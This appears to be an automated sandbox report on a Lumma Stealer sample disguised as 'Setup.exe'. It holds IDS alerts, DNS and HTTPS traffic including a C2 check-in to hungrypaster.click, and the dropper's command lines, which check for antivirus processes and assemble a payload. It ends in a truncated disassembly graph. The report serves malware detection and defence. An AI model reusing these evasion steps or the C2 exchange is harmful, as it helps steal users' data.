                                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-24T01:26:37.505366+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549731188.114.96.6443TCP
                                                                2024-12-24T01:26:38.792709+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549731188.114.96.6443TCP
                                                                2024-12-24T01:26:38.792709+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549731188.114.96.6443TCP
                                                                2024-12-24T01:26:39.991057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549737188.114.96.6443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 24, 2024 01:26:36.282341003 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:36.282450914 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:36.283049107 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:36.284162998 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:36.284197092 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:37.505235910 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:37.505366087 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:37.523394108 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:37.523420095 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:37.523861885 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:37.576908112 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:37.760703087 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:37.760843992 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:37.760874987 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:38.792705059 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:38.792802095 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:38.792875051 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:38.794627905 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:38.794646025 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:38.794671059 CET49731443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:38.794677973 CET44349731188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:38.801104069 CET49737443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:38.801146984 CET44349737188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:38.801237106 CET49737443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:38.801476002 CET49737443192.168.2.5188.114.96.6
                                                                Dec 24, 2024 01:26:38.801489115 CET44349737188.114.96.6192.168.2.5
                                                                Dec 24, 2024 01:26:39.991056919 CET49737443192.168.2.5188.114.96.6

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 24, 2024 01:26:17.346019030 CET6458953192.168.2.51.1.1.1
                                                                Dec 24, 2024 01:26:17.605479002 CET53645891.1.1.1192.168.2.5
                                                                Dec 24, 2024 01:26:35.994781017 CET4949253192.168.2.51.1.1.1
                                                                Dec 24, 2024 01:26:36.275945902 CET53494921.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 24, 2024 01:26:17.346019030 CET192.168.2.51.1.1.10x3aaaStandard query (0)PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSAA (IP address)IN (0x0001)false
                                                                Dec 24, 2024 01:26:35.994781017 CET192.168.2.51.1.1.10x3450Standard query (0)hungrypaster.clickA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 24, 2024 01:26:17.605479002 CET1.1.1.1192.168.2.50x3aaaName error (3)PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSAnonenoneA (IP address)IN (0x0001)false
                                                                Dec 24, 2024 01:26:36.275945902 CET1.1.1.1192.168.2.50x3450No error (0)hungrypaster.click188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 24, 2024 01:26:36.275945902 CET1.1.1.1192.168.2.50x3450No error (0)hungrypaster.click188.114.97.6A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • hungrypaster.click

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549731188.114.96.64432128C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-24 00:26:37 UTC265OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: hungrypaster.click
                                                                2024-12-24 00:26:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-12-24 00:26:38 UTC1130INHTTP/1.1 200 OK
                                                                Date: Tue, 24 Dec 2024 00:26:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=8eb4nce9enp9mbfghlbbn59ogu; expires=Fri, 18 Apr 2025 18:13:17 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                X-Frame-Options: DENY
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rhKrT0YOsXH%2BNadAmoqupzB2506UdiD9I9MPX2zaZ6gGzmzB7W3DjVhbLMSjuDgZQOJ%2BYp9RsPGrPY72bTNTO8lOM%2BeLd1BvZR%2BzOwOAvrfjKYirk7jTMKkFfILteG4HLFzs9qQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8f6c7602fc114378-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1604&rtt_var=677&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1820448&cwnd=235&unsent_bytes=0&cid=fa2ebc908b2867b5&ts=1303&x=0"
                                                                2024-12-24 00:26:38 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                Data Ascii: 2ok
                                                                2024-12-24 00:26:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:19:26:11
                                                                Start date:23/12/2024
                                                                Path:C:\Users\user\Desktop\Setup.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                Imagebase:0x400000
                                                                File size:73'409'696 bytes
                                                                MD5 hash:588EEB3D8F305FC008F034E10E0015C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:19:26:12
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
                                                                Imagebase:0x790000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:19:26:12
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:19:26:14
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist
                                                                Imagebase:0x250000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:19:26:14
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "opssvc wrsa"
                                                                Imagebase:0xf40000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:19:26:14
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist
                                                                Imagebase:0x250000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:19:26:14
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                Imagebase:0xf40000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:19:26:14
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd /c md 280366
                                                                Imagebase:0x790000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:19:26:14
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\extrac32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:extrac32 /Y /E Agrees
                                                                Imagebase:0x3f0000
                                                                File size:29'184 bytes
                                                                MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:19:26:15
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /V "Travels" Served
                                                                Imagebase:0xf40000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:19:26:15
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
                                                                Imagebase:0x790000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:19:26:15
                                                                Start date:23/12/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                Wow64 process (32bit):true
                                                                Commandline:Hc.com I
                                                                Imagebase:0x620000
                                                                File size:947'288 bytes
                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:19:26:15
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:choice /d y /t 5
                                                                Imagebase:0x570000
                                                                File size:28'160 bytes
                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:17.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:21%
                                                                  Total number of Nodes:1482
                                                                  Total number of Limit Nodes:26
                                                                  execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 